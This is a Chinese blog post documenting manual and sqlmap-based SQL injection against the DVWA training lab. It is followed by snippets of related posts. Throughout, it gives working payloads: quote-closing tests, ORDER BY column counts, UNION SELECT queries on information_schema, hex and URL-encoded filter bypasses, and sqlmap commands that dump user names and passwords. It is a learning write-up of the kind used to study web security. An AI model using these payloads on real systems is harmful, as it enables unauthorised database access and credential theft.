【dvwa sql显注记录】

已于 2023-01-12 14:15:44 修改
阅读量296 收藏 2
点赞数
分类专栏: 安全 文章标签: sql web安全
于 2023-01-12 11:31:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuziwan/article/details/128632605
版权

一、简单sql显注步骤

1.先判断是否存在注入点及注入的类型。

(1)简单判断是否有注入点,加单引号报错,就代表有注入的风险,但是不能判断数据是什么类型
在这里插入图片描述
(2)进一步精确判断类型
数字型判断,输入下面两种,返回结果不一致,则存在数字型注入,否则不存在
1 and 1 = 1
1 and 1 = 2
例如,下面这种情况,非数字型注入
在这里插入图片描述
在这里插入图片描述
字符型判断,输入下面两种,返回结果不一致,则存在字符型注入,否则不存在
1’ and ‘1’=‘1
1’ and ‘1’='2
例如 下面这种情况,是字符型注入
在这里插入图片描述
在这里插入图片描述

2.确定有注入漏洞后,根据数据类型,使用ORDER BY 查询列数。

(1)字符型先闭合,在输入order by 判断列数,当输入n语句报错时,字段列数为n-1
1’ order by 2 #(注意省略sql后面语句可用-- 或者#)(-- 后面有空格)

例如如下,字符型类型,字段列数为2
1’ order by 2 #
在这里插入图片描述
1’ order by 3 – 在这里插入图片描述
(2)数字型不需要闭合,直接用order by 判断列数,当输入n语句报错时,字段列数为n-1

例如如下,数字型类型,字段列数为2
1 order by 2 #
在这里插入图片描述
1 order by 3 #
在这里插入图片描述

3.使用union select观察回显的位置

union 是关联前后多个select语句,并把后面sql语句的结果和最开始的一起展示出来。
例如
1’# 结果如下
在这里插入图片描述
1’ union select 1,2# 结果如下,多出个显示1,2的位置,这个是union 后面我们要查询的数据的位置。
在这里插入图片描述
10’ union select 1,2# 结果如下,因为10不是数据库里面所以只显示了union后面的语句结果
在这里插入图片描述

4.获取数据库名。

(1)查询当前数据库
10’ union select 1,database()#
在这里插入图片描述
(2)查询所有数据库
10’ union select 1,schema_name from information_schema.schemata#
在这里插入图片描述

5.获取数据库中的所有表名。

(1)查询dvwa里面所有的表
10’ union select 1,table_name from information_schema.tables where table_schema= ‘dvwa’#
在这里插入图片描述

6.获取数据库的表中的所有字段名

(1)查询user里面所有的字段名
10’ union select 1,column_name from information_schema.columns where table_schema= ‘dvwa’ and table_name= ‘users’#
在这里插入图片描述

7.获取字段中的数据。

(1)查询user,password的数据
10’ union select user, password from dvwa.users#
在这里插入图片描述

二、【dvwa】SQL Injection 手动sqlmap测试记录

1.低级

get请求,直接在搜索框里面写需要注入的数据就行,下面是id后面跟的参数
sqlmap后面直接跟参数,url即可
1.有哪些库
手动
1’ union select 1, schema_name from information_schema.schemata#
在这里插入图片描述
sqlmap工具
sqlmap -u “http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie ‘内容’ --dbs --batch
在这里插入图片描述
2.有哪些表
手动
1’ union select 1, table_name from information_schema.tables where table_schema= ‘dvwa’#
在这里插入图片描述
sqlmap工具
sqlmap -u “http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie ‘内容’ -D dvwa --tables
在这里插入图片描述
3.有哪些字段
手动
1’ union select 1, column_name from information_schema.columns where table_schema= ‘dvwa’ and table_name= ‘users’#
在这里插入图片描述
sqlmap工具
sqlmap -u “http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie ‘内容’ -D dvwa -T users --column
在这里插入图片描述
4.字段内容
手动
1’ union select user, password from dvwa.users#
在这里插入图片描述
sqlmap工具
sqlmap -u “http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie ‘内容’ -D dvwa -T users -C user,password --dump
在这里插入图片描述

2.中级

post请求需要用到工具burp,
sqlmap扫描需要(将post请求包放在1.txt文档里面)
1.有哪些库 dbs
手动
1 union select 1, schema_name from information_schema.schemata#
在这里插入图片描述
sqlmap工具
sqlmap -r Desktop/1.txt --dbs --batch
在这里插入图片描述
2.有哪些表
手动
1 union select 1, table_name from information_schema.tables where table_schema= database()
在这里插入图片描述
sqlmap工具
sqlmap -r Desktop/1.txt -D dvwa --tables
在这里插入图片描述
3.有哪些字段(十六进制绕过,或者整体url编码绕过)
手动
1 union select 1, column_name from information_schema.columns where table_schema= database() and table_name= 0x7573657273 #
在这里插入图片描述
%31%20%61%6e%64%20%31%3d%32%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%20%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%20%77%68%65%72%65%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%20%64%61%74%61%62%61%73%65%28%29%20%61%6e%64%20%74%61%62%6c%65%5f%6e%61%6d%65%3d%20%30%78%37%35%37%33%36%35%37%32%37%33%20%23
在这里插入图片描述
sqlmap工具
sqlmap -r Desktop/1.txt -D dvwa -T users --column
在这里插入图片描述
4.字段内容
手动
1 union select user,password from dvwa.users #
在这里插入图片描述
sqlmap工具
sqlmap -r Desktop/1.txt -D dvwa -T users -C user,passwprd --dump
在这里插入图片描述

3. 高级

1.有哪些库 dbs
手动:需要抓两个页面,一个是提交数据的,一个是发送数据的
1’ union select 1, schema_name from information_schema.schemata#在这里插入图片描述在这里插入图片描述
sqlmap工具
sqlmap -r Desktop/1.txt --dbs --batch 在这里插入图片描述
2.有哪些表
手动
1’ union select 1, table_name from information_schema.tables where table_schema= ‘dvwa’#
在这里插入图片描述在这里插入图片描述
sqlmap工具
sqlmap -r Desktop/1.txt -D dvwa --tables
在这里插入图片描述
3.有哪些字段
手动
1’ union select 1, column_name from information_schema.columns where table_schema= ‘dvwa’ and table_name= ‘users’#
在这里插入图片描述
在这里插入图片描述
sqlmap工具
sqlmap -r Desktop/1.txt -D dvwa -T users --column
在这里插入图片描述
4.字段内容
手动
1’ union select user, password from dvwa.users#
在这里插入图片描述
在这里插入图片描述
sqlmap工具
sqlmap -r Desktop/1.txt -D dvwa -T users -C user,passwprd --dump
在这里插入图片描述

sunshine-01
关注
专栏目录
DVWAsql注入( SQL Injection)
qq_54537919的博客
06-25 788
DVWAsql注入( SQL Injection)全等级low、medium、high
dvwa----sql盲注low级
qq_45487671的博客
05-28 1159
实验4 SQL盲注 1.实验目的 (1)理解SQL盲注(布尔盲注、时间盲注、报错盲注)的原理; (2)学习手工盲注的过程; (3)了解SQL注入的防御技术。 2.实验要求 登陆DVWA平台,结合所学SQL盲注的基本知识,爆出当前使用的数据库名称、数据名称、字段名称、以及关键的字段值(比如用户名、密码等)。关键位置截图。 3.实验过程描述 服务器端源代码 low级别,查看源代码,文本框提交为get请求方式,为佳任何输入过滤限制 同时SQL语句查询返回的结果只有两种, `User ID exists in
DVWA实验-sql显注
Ping_Pig的博客
09-14 653
基础知识要打牢:什么是sql注入 sql注入的测试流程: 判断是否存在注入,注入的类型 获取数据库版本信息,用户等 猜解当前数据库名称 猜解数据库中的名 猜解中的字段名 猜解中的字段值 验证字段的有效性 我们遇到了一个让人怀疑的输入框,根据做安全的敏感神经,我们怀疑框里会有注入,于是我们插入了我们输入的恶意字符,那么恶意字符有哪些呢?什么是...
SQL注入之显错注入
kagariiiii的博客
03-28 291
Sql注入 原理:将用户输入的数据当做sql语句来执行 两个条件:1.用户能用控制输入的内容 2.程序原本要执行的代码拼接了用户的数据执行 pass-01 1.由url判断为get传参 2.输入?id=1 and 1=1,页面显示正常 输入?id=1 and 1=2,页面显示错误 由此判断为数字型注入且有回显 3.输入?id=1 order by 4 页面显示错误 输入?id=1 order by 3 页面显示正常 由此判断当前中字段数为3 4.使用联合查询 输入?id=1 and 1=2 union s
SQL注入1——显注(重学)
qq_52263650的博客
11-01 1242
SQL注入,大一学的了,摆了这么久,在学一遍吧
sql注入专辑-7-sql注入的思路-显注
weixin_48776804的博客
02-14 263
sql注入的思路 sql注入的思路 1 探测有没有注入点,可以使用sqlmap自动测试 自动测试: get包可以使用sqlmap直接探测,sqlmap -u “http://xxxx/id=12” –dbms mysql –level 3,post包先存为文件,手动打入注入点,sqlmap -r 该文件 手动测试: 在输入框输入1‘ and 1=1 ,1’ and 1=2,判断页面变化,前后显示页面不一致,证明存才注入漏洞 2 找到探测点后,加以利用,进一步确定字段数 1’ order by 2#,判断可
17、SQL显错注入
songling515010475的专栏
05-22 333
1.判断是否存在注入,先通过 and 1=1 或 1=2 判断是否存在sql注入,如下图,1=1在sql中运算是为真,1=2为假,所以判断添加的注入是生效了,所以存在SQL注入。 2.猜字段数,通过order by 的形式猜当前查询语句一共有几个字段,通过如下图得出结论 user一共有三个字段。 3.猜名,注入免不了联合查询,既然前面是三个字段哪么联合查询左边和右边查询出来的字段数是必须要匹配的。 作为一个新手,我并不记得老师讲课时注入的具体代码,反正英文挺长的,但记得提到了my.
DVWA的入侵SQL注入
qq_39911925的博客
10-30 549
DVWA攻击记录 LOW级别 SQL手工注入重现漏洞危害 前言>>>>在攻击开始前,我们至少要具备操作mysql的一些简单语句,否则可能此文章对阅读者的你存在困难,有朋友问这都什么年代了还会存在sql注入?其实做这个的时候是因为昨天我编写代码的时候写出了一个sql注入并且在上线的时候被朋友挖掘了出来,漏洞图如下,就因为我的一次逻辑判断错误而导致,所以今天想起了写一次sql注...
DVWA+bWApp+sqli-labs平台 low级别sql注入
qq_42882717的博客
01-07 453
SQL注入漏洞实验手册 实验一:DVWA练习平台low安全级别SQL注入 访问地址:http://127.0.0.1/dvwa,用户名:admin,口令password,成功登录系统。 选择安全级别low,如下图所示。 选择SQL Injection实验,如图所示。 第一步:查找数据输入点,显然User ID是一个数据输入点,输入1-5,会有输入,如图所示,其他数据没有输出。 第二步:SQL注入点测试 首先测试一下是不是数字型的注入点,输入“1 or 1=1”,“1 an.
DVWASQL注入的步骤
最新发布
XZZbh的博客
09-18 664
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。
SQL注入(回显)-DVWA
xy_sugar的博客
01-23 2683
概述 LOW等级 1、首先尝试正常操作,输入1 可是这里web应用通过查询数据库,获取了id为1的用户的信息,猜测SQL语句为: 2、接下来检测是否存在SQL注入漏洞,输入1’   报错,则说明单引号注入到SQL语句中报错,存在SQL注入漏洞 尝试数字型,查询结果与id=1时的结果一样 尝试第二种情况,成功执行 尝试双引号,也没有成功 所以可知这里...
DVWA通关教程(下)
m0_57349349的博客
08-03 2144
DVWASQL注入和SQL盲注 sql注入 1.low级别 (1)判断是否存在注入点,是字符型还是数字形 输入 1,查询成功; 输入 1 and 1=1,发现查询仍然成功;//非数字形 输入 1/,发现查询仍然成功; 输入 1’,查询失败。出现如下图: (2)猜解 SQL 查询语句中的字段数 输入1' order by 10 # 发现报错 尝试1' order by 2 # 成功 (3)确定显示的字段顺序 输入 1' union select 1,2 # ...
DVWA-SQL注入(全级别)
小纯的博客
02-08 6460
一、SQL注入概念 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的 6.获取中的字段名 7.得到数据 ...
小记一次DVWA靶场中SQL注入
ranuy阮的博客
02-25 782
0x01 环境介绍 DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 0x02 测试过程 low级别,关于mysql日志 查询是否启用日志 mysql>show variables like ‘log_%’; MySQL有以下几种日志: 错误日志: -log-err 查询日志: -log 慢查询日...
DWVA[SQL-Injection]学习记录
nareku的博客
07-04 417
之前都学不懂SQL注入,学到一半的理论知识 实操也学不会 直接丢下去学其他的了,打打ctf发现很多东西还是和SQL注入沾边的,这不立刻马上加班加点重新捡起来呜呜呜!!! 搭了个DVWAsqli-labs来辅助学习,先学会手工注入先哈哈哈输入1, 看看回显 可以发现传参是通过GET的方式,先看看后台是怎么执行SQL语句的 即 则执行的SQL语句为: 输入 1’试试 可以发现输入 1和 1’ 得到的页面是不一样的,说明是字符型注入 试试 1’ and 1=1 # (按照Mysql语法,#后面会被注释掉
SQL注入 为什么会有 num1‘ order by num2# , 为什么会有 union select 1,2,3...
weixin_45897324的博客
10-07 1058
SQL注入 为什么会有 num1’ order by num2# , 为什么会有 union select 1,2,3… group by / order by 如 1’ order by 3# group by, order by 后面跟数字,指的是 select 后面选择的列(属性),这里的3 代第一个属性,依次类推。 当中只有3个列时,order by 4就会出错 union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填
【## 解决如何安装DVWA以及安装过后数据库无法打开和DVWA无法连接数据库的问题】
weixin_54586360的博客
06-30 5443
DVWA安装及相关问题解决
SQL注入的一些命令
jkhdjkasd的博客
07-27 1720
sqlmap的常用命令
SQL注入-报错注入
qq_65240014的博客
08-08 857
本文主要介绍一种结合burpsuite的报错注入的sql注入方法
dvwa sql注入
08-27
DVWA(Damn Vulnerable Web Application)是一个用于练习和测试网络应用程序安全性的开源应用程序。其中包含了多种漏洞类型,包括 SQL 注入。 在 DVWA 中进行 SQL 注入练习,可以通过以下步骤进行: 1. 安装和配置 DVWA:首先,需要下载 DVWA,并将其部署到本地服务器或虚拟机中。然后,根据提供的说明进行配置,设置安全级别为“低”。 2. 寻找 SQL 注入点:在 DVWA 中,通常会提供一些具有漏洞的页面。你需要找到一个接受用户输入并构建 SQL 查询的页面。 3. 探测注入点:尝试在输入字段中插入一些特殊字符(如单引号、分号等),观察是否引发了错误消息或页面行为异常。如果发现异常,很可能存在注入点。 4. 利用注入点:一旦找到注入点,你可以尝试构造恶意的 SQL 查询,例如使用 UNION SELECT 语句来获取额外的信息或绕过身份验证。 请注意,SQL 注入是一种非法行为,只能在合法授权和合法目的的环境下进行。在实际应用中,务必采取适当的安全措施,如使用参数化查询或 ORM 框架来防止 SQL 注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值